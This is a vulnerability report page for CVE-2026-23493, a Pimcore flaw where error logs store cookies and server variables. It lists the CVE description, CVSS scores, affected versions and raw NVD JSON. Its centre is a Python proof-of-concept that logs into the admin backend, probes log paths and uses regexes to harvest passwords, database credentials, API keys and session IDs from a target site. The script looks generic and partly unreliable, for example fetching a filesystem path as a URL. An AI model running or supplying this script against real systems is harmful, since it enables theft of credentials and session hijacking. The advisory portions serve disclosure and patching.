Security Vulnerability Report
中文
CVE-2026-23493 CVSS 8.6 HIGH

CVE-2026-23493

Published: 2026-01-15 17:16:08
Last Modified: 2026-01-20 21:48:53
Source: [email protected]

Description

Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend. This vulnerability is fixed in 12.3.1 and 11.5.14.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pimcore:pimcore:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:pimcore:pimcore:*:*:*:*:*:*:*:* - VULNERABLE
Pimcore < 11.5.14
Pimcore < 12.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23493 PoC - Pimcore Sensitive Information Disclosure # This PoC demonstrates accessing http_error_log to extract sensitive data import requests import re from urllib.parse import urljoin def cve_2026_23493_poc(target_url, credentials=None): """ Pimcore http_error_log Information Disclosure PoC Requirements: - Valid admin session cookie OR direct file system access - Access to Pimcore admin backend Steps: 1. Authenticate to Pimcore admin panel 2. Navigate to Tools > Logs or directly access error logs 3. Read http_error_log file content 4. Extract sensitive data from $_COOKIE and $_SERVER variables """ results = { 'vulnerable': False, 'sensitive_data_found': [], 'log_excerpts': [] } # Target paths for accessing logs log_paths = [ '/admin/logs', '/admin/maintenance-log', '/var/log/http_error.log', '/pimcore var/log/http-error.log' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # If credentials provided, attempt authentication session = requests.Session() if credentials: login_url = urljoin(target_url, '/admin/login') session.post(login_url, data=credentials) # Try to access log files for path in log_paths: try: response = session.get(urljoin(target_url, path), headers=headers, timeout=10) if response.status_code == 200: # Check for sensitive patterns in log content sensitive_patterns = [ r'\$_COOKIE\[.*?\]\s*=\s*[\"\'](.*?)[\"\']', r'\$_SERVER\[.*?\]\s*=\s*[\"\'](.*?)[\"\']', r'(password|passwd|pwd)[=:]\s*\S+', r'(database|db|sql)[_-]?(host|pass|user)[=:]\s*\S+', r'(api[_-]?key|secret|token)[=:]\s*\S+', r'(PHPSESSID|session[_-]?id)[=:]\s*\S+' ] for pattern in sensitive_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: results['vulnerable'] = True results['sensitive_data_found'].extend(matches) results['log_excerpts'].append({ 'path': path, 'status': response.status_code, 'size': len(response.content) }) except Exception as e: continue return results def extract_from_log_file(log_content): """ Parse http_error_log content and extract sensitive information Expected log format: [timestamp] ERROR: ... $_COOKIE[...] = "..." $_SERVER[...] = "..." """ extracted = { 'cookies': {}, 'server_vars': {}, 'credentials': [], 'session_ids': [] } # Pattern to match $_COOKIE variable assignments cookie_pattern = r'\$_COOKIE\[["\']([^"\']+)["\']\]\s*=\s*["\']([^"\']+)["\']' for match in re.finditer(cookie_pattern, log_content): key, value = match.groups() extracted['cookies'][key] = value if 'session' in key.lower() or 'sessid' in key.lower(): extracted['session_ids'].append(value) # Pattern to match $_SERVER variable assignments server_pattern = r'\$_SERVER\[["\']([^"\']+)["\']\]\s*=\s*["\']([^"\']+)["\']' for match in re.finditer(server_pattern, log_content): key, value = match.groups() extracted['server_vars'][key] = value # Check for credentials sensitive_keys = ['PASSWORD', 'PASSWD', 'DB_PASS', 'API_KEY', 'SECRET'] if any(s in key.upper() for s in sensitive_keys): extracted['credentials'].append({key: value}) return extracted if __name__ == '__main__': # Example usage target = 'https://vulnerable-pimcore-site.com' # Test without authentication (if logs are publicly accessible) result = cve_2026_23493_poc(target) print(f'Venerable: {result["vulnerable"]}') print(f'Sensitive data found: {len(result["sensitive_data_found"])} items') print(f'Log files accessible: {len(result["log_excerpts"])} files')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23493", "sourceIdentifier": "[email protected]", "published": "2026-01-15T17:16:08.293", "lastModified": "2026-01-20T21:48:53.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend. This vulnerability is fixed in 12.3.1 and 11.5.14."}, {"lang": "es", "value": "Pimcore es una Plataforma de Gestión de Datos y Experiencias de Código Abierto. Antes de las versiones 12.3.1 y 11.5.14, el archivo http_error_log almacena las variables $_COOKIE y $_SERVER, lo que significa que información sensible como contraseñas de base de datos, datos de sesión de cookie y otros detalles pueden ser accedidos o recuperados a través del backend de Pimcore. Esta vulnerabilidad está corregida en las versiones 12.3.1 y 11.5.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pimcore:pimcore:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.5.14", "matchCriteriaId": "0B2CDE57-18BF-48B4-A0D7-BA3673CD3016"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pimcore:pimcore:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.3.1", "matchCriteriaId": "FD4D552C-238D-49EC-8F68-19EC520EAD57"}]}]}], "references": [{"url": "https://github.com/pimcore/pimcore/commit/002ec7d5f84973819236796e5b314703b58e8601", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pimcore/pimcore/pull/18918", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/pimcore/pimcore/releases/tag/v11.5.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-q433-j342-rp9h", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-q433-j342-rp9h", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.